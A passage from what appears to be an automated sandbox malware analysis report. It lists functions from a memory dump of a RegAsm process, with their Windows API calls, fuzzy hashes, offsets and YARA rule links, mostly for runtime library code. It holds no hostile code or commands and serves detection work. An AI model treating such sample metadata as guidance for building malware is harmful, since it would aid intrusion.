                                                                • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                                • Opcode Fuzzy Hash: dab0a497b08e8df346a97c8899a5e14908918034842a488b938a10d87d6eec82
                                                                • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                                Function 004520B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                • String ID: JD
                                                                • API String ID: 1084509184-2669065882
                                                                • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: GetLocaleInfoEx
                                                                • API String ID: 2299586839-2904428671
                                                                • Opcode ID: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                                • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                • Opcode Fuzzy Hash: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                                • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                Function 00446270 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                                • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                                                • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                                • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                                                Function 004120B2 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$FreeProcess
                                                                • String ID:
                                                                • API String ID: 3859560861-0
                                                                • Opcode ID: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                                • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                                                • Opcode Fuzzy Hash: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                                • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                                                Function 004533AB Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004533A6,?,?,00000008,?,?,0045625D,00000000), ref: 004535D8
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionRaise
                                                                • String ID:
                                                                • API String ID: 3997070919-0
                                                                • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                • Instruction ID: 7263c04077df6a1dd25da4ac29b5b982fa38ace811980f45f75c7c5cedc24273
                                                                • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                • Instruction Fuzzy Hash: 0FB13B315106089FD715CF28C48AB657BE0FF053A6F25865DE899CF3A2C339EA96CB44
                                                                Function 004339D7 Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0
                                                                • API String ID: 0-4108050209
                                                                • Opcode ID: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                                • Instruction ID: b5ae8e6f7fa87a7dee9e60626e0a37a25df5f2dd99b83f8da903d7583ecded6c
                                                                • Opcode Fuzzy Hash: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                                • Instruction Fuzzy Hash: 0C129E727083048BD304DF65D882A1EB7E2BFCC758F15892EF495AB381DA74E915CB86
                                                                Function 00434CB6 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FeaturePresentProcessor
                                                                • String ID:
                                                                • API String ID: 2325560087-0
                                                                • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                • String ID:
                                                                • API String ID: 1663032902-0
                                                                • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                • String ID:
                                                                • API String ID: 2692324296-0
                                                                • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                • String ID:
                                                                • API String ID: 1272433827-0
                                                                • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                • String ID:
                                                                • API String ID: 1084509184-0
                                                                • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID:
                                                                • API String ID: 2299586839-0
                                                                • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                • Instruction Fuzzy Hash:
                                                                Function 00427AD7 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @
                                                                • API String ID: 0-2766056989
                                                                • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                • Instruction ID: bbd91956ea41f9089fdf4ea26de33e0e8d132f349ea16d9e77f48d305cf446da
                                                                • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                • Instruction Fuzzy Hash: F1412975A183558FC340CF29D58020AFBE1FFC8318F645A1EF889A3350D379E9428B86
                                                                Function 0044DA49 Relevance: .6, Instructions: 637COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                                                • Instruction ID: 4200599dcb49c21c1ca78238ad82984ca11e49a574bdd01b256a4bdf4e559873
                                                                • Opcode Fuzzy Hash: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                                                • Instruction Fuzzy Hash: D2322521D69F414DE7239A35CC22336A24CBFB73C5F15D737E81AB5AAAEB29C4834105
                                                                Function 0041F18B Relevance: .6, Instructions: 598COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                                                • Instruction ID: 06c66d0f35fb266b7f69fbfce4f1f639eb17408d85dd7e5468211ecdc8378744
                                                                • Opcode Fuzzy Hash: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                                                • Instruction Fuzzy Hash: 7932C2716087459BC715DF28C4807ABB7E5BF84318F040A3EF89587392D779D98ACB8A
                                                                Function 0042742E Relevance: .4, Instructions: 435COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                                                • Instruction ID: b033fe34555866f616fd3cc64b543b740d9cc82fbf2d17309ab2a27531c6336b
                                                                • Opcode Fuzzy Hash: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                                                • Instruction Fuzzy Hash: 6C02CEB17046528BC358CF2EEC5053AB7E1AB8D311744863EE495C7781EB35FA22CB94
                                                                Function 00426E9F Relevance: .4, Instructions: 383COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                                                • Instruction ID: 06b531cc06dcd57701b547059d2c567c45bbe225ee7d26ac7aed84b394be02a5
                                                                • Opcode Fuzzy Hash: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                                                • Instruction Fuzzy Hash: 2DF19D716142558FC348CF1DE8A187BB3E1FB89311B450A2EF582C3391DB79EA16CB56
                                                                Function 00437DB3 Relevance: .3, Instructions: 345COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                • Instruction ID: 2ce137016e68017aebaac4bbf916a57dff7c64f07ba89619fc9d118b501662d8
                                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                • Instruction Fuzzy Hash: F9C1D5B22091930AEF3D4639853063FFAA05E957B171A635FE4F2CB2D4FE18C924D514
                                                                Function 004381E8 Relevance: .3, Instructions: 341COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                • Instruction ID: bc2d6065b6eca92eb436045fb502f22698d18e4b36ed1375ff5d5b4a3f5914d0
                                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                • Instruction Fuzzy Hash: 75C1D7722091930AEF2D4739853463FFAA15EA57B171A236FE4F2CB2D4FE28C924D514
                                                                Function 0043797E Relevance: .3, Instructions: 331COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                • Instruction ID: 708e8454946620f186a1700387687a053fc407bd339bf74556c1f47a113f5a1a
                                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                • Instruction Fuzzy Hash: 95C1C3B220D0930AEF3D4639853063FFAA15EA67B171A675ED4F2CB2D4FE18C924D614
                                                                Function 00437566 Relevance: .3, Instructions: 323COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                • Instruction ID: 79ee4f31eba35b7567f7a499d226924a3a6c1d38d98321864059dc3c63d33f3d
                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                • Instruction Fuzzy Hash: 76C1E6B220D0930AEF3D4639853463FBAA15EA57B171A236FD4F2CB2D4FE18C924C614
                                                                Function 0041DBF3 Relevance: .3, Instructions: 277COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                                                • Instruction ID: 096ff1c695f9ab27d4b2dbab46670c8098de74970727e2ec16deab2a6828ec1d
                                                                • Opcode Fuzzy Hash: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                                                • Instruction Fuzzy Hash: EAB1A37951429A8ACB05EF68C4913F63BA1EF6A301F0850B9EC9CCF757D2398506EB24
                                                                Function 0043E34B Relevance: .2, Instructions: 237COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                • Instruction ID: 32d6082e35155a0a096806a6943d6f48c3d67459c64856e3d931f7c23e0710f9
                                                                • Opcode Fuzzy Hash: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                • Instruction Fuzzy Hash: 59618971202709A6EE34892B88967BF63949F6D314F10342FE983DB3C1D65DDD82931E
                                                                Function 0043E5A8 Relevance: .2, Instructions: 237COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                • Instruction ID: 5d22fc1bcc5d638cf6a4a0606be4d5c4d5bba199c703cf788a7f99cafe8d65e8
                                                                • Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                • Instruction Fuzzy Hash: 12615871602718A6DA38592B88977BF2384EB2D344F94351BE483DB3C1D75EAD43871E
                                                                Function 0043E11C Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                • Instruction ID: 6c705508b021f12d90b9f9697341ee8142861c1d23b7247138392dbd6e0aa073
                                                                • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                • Instruction Fuzzy Hash: 59517671603604A7EF3445AB85567BF63899B0E304F18395FE882C73C2C52DDE02875E
